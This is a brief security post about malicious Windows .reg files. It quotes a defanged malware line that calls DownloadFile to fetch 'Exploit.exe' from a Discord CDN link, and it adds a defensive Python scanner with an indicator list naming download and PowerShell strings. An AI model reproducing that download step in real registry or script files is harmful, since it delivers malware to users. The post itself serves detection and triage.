SANS ISC shared that files with the “REG” extension, which are used to update the Windows registry, can contain malicious scripts or code. Avoid processing files with these unusual extensions if they show up in email or links.

Infected With a .reg File

Today, I spotted another file that is also interesting: A Windows Registry file (with a “.reg” extension). Such files are text files created by exporting values from the Registry (export) but they can also be used to add or change values in the Registry (import). Being text files, they don’t look suspicious.  Deep in the CODE is —  DownloadFile(‘hxxps://cdn[.]discord***[.]com/attachments/847773813131182112/868160361466040321/Exploit.exe‘,
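Because .reg files are plain text, they can be triaged before anyone imports them. The following is an added example, not code from the SANS ISC diary or from this post: it parses a .reg file and lists values whose data contains download-related strings such as `DownloadFile(`, including data stored as UTF-16LE exports or as `hex(...)` values. The indicator list, the key name and the sample content are constructed assumptions.

```python
import re

# Substrings worth an analyst's review in value data (assumed starter list).
INDICATORS = ("downloadfile", "powershell", "http://", "https://", "hxxp")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
HEX_RE = re.compile(r"^hex(?:\([0-9a-f]+\))?:(.*)$", re.I)

def decode_reg(raw: bytes) -> str:
    # regedit exports UTF-16LE with a BOM; hand-made files are often ANSI/UTF-8.
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def value_text(data: str) -> str:
    # hex data may hold UTF-16LE strings (hex(1), hex(2), hex(7)) as comma-separated bytes.
    m = HEX_RE.match(data)
    if not m:
        return data
    try:
        blob = bytes(int(b, 16) for b in m.group(1).split(",") if b.strip())
    except ValueError:
        return data
    return blob.decode("utf-16-le", errors="replace")

def scan_reg(raw: bytes):
    """Return (key, value_name, indicator) for every value that needs review."""
    # Join continuation lines (trailing backslash) so long hex values stay whole.
    text = re.sub(r"\\\r?\n[ \t]*", "", decode_reg(raw))
    findings, key = [], None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            haystack = value_text(m.group(2)).lower()
            name = m.group(1).strip('"')
            findings += [(key, name, i) for i in INDICATORS if i in haystack]
    return findings

# Constructed sample: placeholder key, defanged placeholder URL, UTF-16LE like an export.
SAMPLE = b"\xff\xfe" + (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_CURRENT_USER\\Software\\ExamplePlaceholder]\r\n"
    '"Note"="hello"\r\n'
    "\"Task\"=\"x.DownloadFile('hxxps://example[.]invalid/placeholder.exe',\"\r\n"
).encode("utf-16-le")

if __name__ == "__main__":
    print(scan_reg(SAMPLE))
```

A plain byte search for `DownloadFile` would miss both the UTF-16LE export and the hex-encoded value, which is why the scanner decodes before matching.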